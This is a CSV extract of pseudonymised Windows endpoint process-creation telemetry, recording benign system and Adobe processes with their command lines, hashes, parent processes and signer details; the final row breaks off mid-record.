+1172,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 02:40:56.040569100+00:00,21072,SnippingTool.exe,"""SnippingTool.exe"" ",PortableExecutable,2021-02-17 04:35:43.842740800+00:00,C:\Windows\System32\SnippingTool.exe,3382272,f06d69f2fdd4d6a4e16f55769b7dccc1,83be001996cd4d9e5a1a8cd130e17e5b5ee81c9b5cf1b9d9196d8a39fbf7506d,735eb9b032d924b59a8767b9d49bdb88bed05220,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:00.068282600+00:00,15164,explorer.exe,Explorer.EXE,False,2021-06-25 00:38:59.791718800+00:00,20356,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:40:56.139915+00:00,2021-06-25 02:41:58.613666400+00:00,9f59d25e-253b-4493-a357-dc55abe74311,computerpii_0a470890c60768167990033d701e7bd881398861,185784,False,10.7740.19041.1052,False,11540474045178163,,11540474045179145,2021-06-25 00:39:00.068282600+00:00,15164,2021-06-25 00:39:00.068282600+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,15164,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-25 00:39:00.076466400+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,20481.0,1.0,3073.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,SnippingTool,SnippingTool.exe,Snipping Tool
+1173,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:01:56.969890400+00:00,5396,LogTransport2.exe,"""LogTransport2.exe"" 58F761C05F236BDC0A495FBA@AdobeID 1 0 NOVALUE NOVALUE",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\LogTransport2.exe,855264,5f478ee4a63932d1ed50a41c55a29e23,c7578c3d0f3a474bee2788cb8560fff57ddaecd1138b98e334ba92941c58a754,fdd8d08ae21a4edd569c31f098ad75aaacd783e2,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:18:58.493511600+00:00,17444,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Downloads\FilePII_078283040e9b0a98aca7d0d9108d59efb1e7f921.pdf""",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:01:57.044177700+00:00,2021-06-24 10:58:57.653351+00:00,a41175df-5b6f-4569-b601-e45fa5471740,computerpii_0a470890c60768167990033d701e7bd881398861,178893,False,10.7740.19041.1052,False,11540474045176201,,11540474045177775,2021-06-24 03:18:58.493511600+00:00,17444,2021-06-24 03:18:58.493511600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,17444,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,3796704,2021-05-28 05:30:12+00:00,2021-05-28 05:58:58+00:00,2021-06-24 03:18:58.497405900+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1025.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC ,Adobe Systems Incorporated, LogTransport Application,8.2.0.14,LogTransport2,LogTransport2.exe,LogTransport Application
+1174,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:01:56.994870600+00:00,18880,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,5f478ee4a63932d1ed50a41c55a29e23,c7578c3d0f3a474bee2788cb8560fff57ddaecd1138b98e334ba92941c58a754,fdd8d08ae21a4edd569c31f098ad75aaacd783e2,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:01:56.969890400+00:00,5396,LogTransport2.exe,"""LogTransport2.exe"" 58F761C05F236BDC0A495FBA@AdobeID 1 0 NOVALUE NOVALUE",False,2021-06-24 03:18:58.493511600+00:00,17444,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:01:57.045258900+00:00,2021-06-24 10:58:57.653418800+00:00,54a1ed39-135d-49d6-af6e-d1d24d6f2ef9,computerpii_0a470890c60768167990033d701e7bd881398861,178894,False,10.7740.19041.1052,False,11540474045177775,,11540474045177776,2021-06-24 10:01:56.969890400+00:00,5396,2021-06-24 10:01:56.969890400+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\LogTransport2.exe,5396,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,855264,2021-03-12 07:10:28+00:00,2021-05-28 05:58:58+00:00,2021-06-24 10:01:57.012452400+00:00,2021-05-28 05:58:58+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,Adobe Systems Incorporated, LogTransport Application,8.2.0.14,LogTransport2,LogTransport2.exe,LogTransport Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1175,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 10:02:05.542723800+00:00,5216,smss.exe,smss.exe 00000140 00000088 C:\Windows\System32\WinLogon.exe -SpecialSession,PortableExecutable,2021-05-12 01:12:36.677345+00:00,C:\Windows\System32\smss.exe,155976,2c3f91bb4c0994a7b36ed0b6b14ec9c7,56afe5133fdc5806ec6b19436f7b55f1499cfc94619740c171424fbcf7808fd3,53311cbde782da05c8ef97d7bc40d768e3a3ea64,2c3f91bb4c0994a7b36ed0b6b14ec9c7,56afe5133fdc5806ec6b19436f7b55f1499cfc94619740c171424fbcf7808fd3,53311cbde782da05c8ef97d7bc40d768e3a3ea64,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:07.324991200+00:00,728,smss.exe,smss.exe,True,2021-06-10 00:46:07.323061100+00:00,4,%system%\ntoskrnl.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:02:05.674141+00:00,2021-06-24 10:58:57.655060700+00:00,0499df11-7515-43b4-9a12-df47b54dd58e,computerpii_0a470890c60768167990033d701e7bd881398861,178913,False,10.7740.19041.1052,False,11540474045136899,,11540474045177780,2021-06-10 00:46:07.324991200+00:00,728,2021-06-10 00:46:07.324991200+00:00,\Device\HarddiskVolume3\Windows\System32\smss.exe,728,18560,ActiveProcessStartkey,C:\Windows\System32,155976,2022-03-18 20:18:05+00:00,2021-05-12 01:12:36.681334+00:00,2021-06-10 00:46:10.497846200+00:00,2021-05-12 01:12:36.677345+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,smss.exe,smss.exe,Windows Session Manager,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,smss.exe,smss.exe,Windows Session Manager
+1176,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 10:02:05.558103300+00:00,12392,csrss.exe,"csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16",PortableExecutable,2020-10-09 20:47:25.808617300+00:00,C:\Windows\System32\csrss.exe,17600,72565e7a0145e0657e586f6cf7696dc7,6f1c9b4c187669bc0371260d121caf48d65f829a9104c483befbd8fc0bed24f5,11eba7b1e26cc7d492a2c161ac48370811d0b01e,2c3f91bb4c0994a7b36ed0b6b14ec9c7,56afe5133fdc5806ec6b19436f7b55f1499cfc94619740c171424fbcf7808fd3,53311cbde782da05c8ef97d7bc40d768e3a3ea64,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 10:02:05.542723800+00:00,5216,smss.exe,smss.exe 00000140 00000088 C:\Windows\System32\WinLogon.exe -SpecialSession,True,2021-06-10 00:46:07.324991200+00:00,728,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:02:05.695534600+00:00,2021-06-24 10:58:57.655138800+00:00,90631331-1deb-4a17-90e5-baf0b1d309c9,computerpii_0a470890c60768167990033d701e7bd881398861,178914,False,10.7740.19041.1052,False,11540474045177780,,11540474045177781,2021-06-24 10:02:05.542723800+00:00,5216,2021-06-24 10:02:05.542723800+00:00,\Device\HarddiskVolume3\Windows\System32\smss.exe,5216,128,TerminateProcessStartkey,C:\Windows\System32,155976,2022-03-18 20:18:05+00:00,2021-05-12 01:12:36.681334+00:00,2021-06-24 10:02:05.543221200+00:00,2021-05-12 01:12:36.677345+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,smss.exe,smss.exe,Windows Session Manager,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,CSRSS.Exe,CSRSS.Exe,Client Server Runtime Process
+1177,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 10:02:05.609829800+00:00,2036,winlogon.exe,WinLogon.exe -SpecialSession,PortableExecutable,2021-04-14 01:10:22.046876900+00:00,C:\Windows\System32\winlogon.exe,907776,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,2c3f91bb4c0994a7b36ed0b6b14ec9c7,56afe5133fdc5806ec6b19436f7b55f1499cfc94619740c171424fbcf7808fd3,53311cbde782da05c8ef97d7bc40d768e3a3ea64,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 10:02:05.542723800+00:00,5216,smss.exe,smss.exe 00000140 00000088 C:\Windows\System32\WinLogon.exe -SpecialSession,True,2021-06-10 00:46:07.324991200+00:00,728,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:02:05.708071+00:00,2021-06-24 10:58:57.655219300+00:00,6c951d8d-f1b1-450f-8790-3d54e3e319e8,computerpii_0a470890c60768167990033d701e7bd881398861,178915,False,10.7740.19041.1052,False,11540474045177780,,11540474045177782,2021-06-24 10:02:05.542723800+00:00,5216,2021-06-24 10:02:05.542723800+00:00,\Device\HarddiskVolume3\Windows\System32\smss.exe,5216,128,TerminateProcessStartkey,C:\Windows\System32,155976,2022-03-18 20:18:05+00:00,2021-05-12 01:12:36.681334+00:00,2021-06-24 10:02:05.543221200+00:00,2021-05-12 01:12:36.677345+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,smss.exe,smss.exe,Windows Session Manager,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application
+1178,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 10:02:05.614822500+00:00,8932,LogonUI.exe,"""LogonUI.exe"" /flags:0x4 /state0:0xb36a8855 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 11:04:14.036541300+00:00,11720,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-23 11:04:13.923843100+00:00,14724,smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:02:05.710673100+00:00,2021-06-24 10:58:57.655378400+00:00,0f506a8c-f1ff-4070-9971-28a4d0c5bf61,computerpii_0a470890c60768167990033d701e7bd881398861,178917,False,10.7740.19041.1052,False,11540474045175072,,11540474045177783,2021-06-23 11:04:14.036541300+00:00,11720,2021-06-23 11:04:14.036541300+00:00,winlogon.exe,11720,256,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-23 11:04:14.025533400+00:00,2021-04-14 01:10:22.046876900+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+1179,False,Low,S-1-5-96-0-18,UserPII_0dd761a5af617bf195e760b8f7b8c7535f0fafb3,DomainPII_a2be182551aacddef017cf9363706e91d81d4423,TokenElevationTypeDefault,NotWeb,2021-06-24 10:02:05.681578200+00:00,9180,fontdrvhost.exe,"""fontdrvhost.exe""",PortableExecutable,2021-04-14 01:10:21.939209700+00:00,C:\Windows\System32\fontdrvhost.exe,825880,2cde36034913cb3869c8cfcdd5a616ff,ad6731a03531b1214e9fbd8afdf925ebf8adb490e79127729f0312316add3207,30d135dcc5406e84b08a2cd676190b4d8d919ef4,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 10:02:05.609829800+00:00,2036,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-24 10:02:05.542723800+00:00,5216,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:02:05.922667+00:00,2021-06-24 10:58:57.655682600+00:00,bfc8b4c6-335a-422d-8359-7325bdd9c27a,computerpii_0a470890c60768167990033d701e7bd881398861,178921,False,10.7740.19041.1052,False,11540474045177782,,11540474045177784,2021-06-24 10:02:05.609829800+00:00,2036,2021-06-24 10:02:05.609829800+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,2036,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-24 10:02:05.605706600+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,465206090,False,,0.0,,65536.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,fontdrvhost.exe,fontdrvhost.exe,Usermode Font Driver Host
+1180,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 10:02:05.711030100+00:00,19744,LogonUI.exe,"""LogonUI.exe"" /flags:0x2 /state0:0xb36aa055 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 10:02:05.609829800+00:00,2036,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-24 10:02:05.542723800+00:00,5216,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:02:05.932306800+00:00,2021-06-24 10:58:57.655760900+00:00,c13c3044-2a47-4862-86b3-3d2d7b5432a0,computerpii_0a470890c60768167990033d701e7bd881398861,178922,False,10.7740.19041.1052,False,11540474045177782,,11540474045177785,2021-06-24 10:02:05.609829800+00:00,2036,2021-06-24 10:02:05.609829800+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,2036,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-24 10:02:05.605706600+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+1181,False,System,S-1-5-90-0-18,UserPII_38d2d841536b8f5da534244922a5799b0c9c1f68,DomainPII_6ec056e8fda78656edc46e4c7be3f929091d68ee,TokenElevationTypeLimited,NotWeb,2021-06-24 10:02:05.711803600+00:00,9844,dwm.exe,"""dwm.exe""",PortableExecutable,2021-02-17 04:35:04.693102300+00:00,C:\Windows\System32\dwm.exe,94720,5c27608411832c5b39ba04e33d53536c,0ac827c9e35cdaa492ddd435079415805dcc276352112b040bcd34ef122cf565,f92f8b7439ce1de4c297046ed1d3ff9f20bc97af,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 10:02:05.609829800+00:00,2036,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-24 10:02:05.542723800+00:00,5216,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:02:05.977848500+00:00,2021-06-24 10:58:57.655840700+00:00,26332a70-bf2d-429b-ade1-3bfd62093132,computerpii_0a470890c60768167990033d701e7bd881398861,178923,False,10.7740.19041.1052,False,11540474045177782,,11540474045177786,2021-06-24 10:02:05.609829800+00:00,2036,2021-06-24 10:02:05.609829800+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,2036,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-24 10:02:05.605706600+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,465210214,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,dwm.exe,dwm.exe,Desktop Window Manager
+1182,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:02:05.804856700+00:00,7372,LogTransport2.exe,"""LogTransport2.exe"" 58F761C05F236BDC0A495FBA@AdobeID 0 0 NOVALUE NOVALUE",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\LogTransport2.exe,855264,5f478ee4a63932d1ed50a41c55a29e23,c7578c3d0f3a474bee2788cb8560fff57ddaecd1138b98e334ba92941c58a754,fdd8d08ae21a4edd569c31f098ad75aaacd783e2,73d9fdd6ba9f5634ce8ab8b1f54abbd9,ee19864aa66a2dee5fcefa1f298498d8244b021294f2000a6e702b9e17ebddc1,20002f924780ab3595dd8c307e785ad429b4512c,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:41.997705100+00:00,16580,acrotray.exe,"""acrotray.exe"" ",False,2021-06-24 00:52:40.992619+00:00,14292,\Device\HarddiskVolume3\Windows\SysWOW64\runonce.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:02:06.022734200+00:00,2021-06-24 10:58:57.655918300+00:00,c4497bd5-4d00-4f56-98a0-09184fcfe623,computerpii_0a470890c60768167990033d701e7bd881398861,178924,False,10.7740.19041.1052,False,11540474045175234,,11540474045177787,2021-06-24 00:52:41.997705100+00:00,16580,2021-06-24 00:52:41.997705100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrotray.exe,16580,128,TerminateProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,5296352,2021-05-28 02:46:51+00:00,2021-05-28 05:58:58+00:00,2021-06-24 00:52:42.009038800+00:00,2021-05-28 05:58:58+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Inc.,AcroTray - Adobe Acrobat Distiller helper application.,21.5.20048.436468,AcroTray,AcroTray.exe,AcroTray,Adobe Systems Incorporated, LogTransport Application,8.2.0.14,LogTransport2,LogTransport2.exe,LogTransport Application
+1183,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 10:02:05.836763+00:00,8420,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,5f478ee4a63932d1ed50a41c55a29e23,c7578c3d0f3a474bee2788cb8560fff57ddaecd1138b98e334ba92941c58a754,fdd8d08ae21a4edd569c31f098ad75aaacd783e2,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:02:05.804856700+00:00,7372,LogTransport2.exe,"""LogTransport2.exe"" 58F761C05F236BDC0A495FBA@AdobeID 0 0 NOVALUE NOVALUE",False,2021-06-24 00:52:41.997705100+00:00,16580,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrotray.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 10:02:06.026592900+00:00,2021-06-24 10:58:57.656009200+00:00,61da71e6-8a6d-46b5-91c9-775714f865e8,computerpii_0a470890c60768167990033d701e7bd881398861,178925,False,10.7740.19041.1052,False,11540474045177787,,11540474045177789,2021-06-24 10:02:05.804856700+00:00,7372,2021-06-24 10:02:05.804856700+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\LogTransport2.exe,7372,18560,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,855264,2021-03-12 07:10:28+00:00,2021-05-28 05:58:58+00:00,2021-06-24 10:01:57.012452400+00:00,2021-05-28 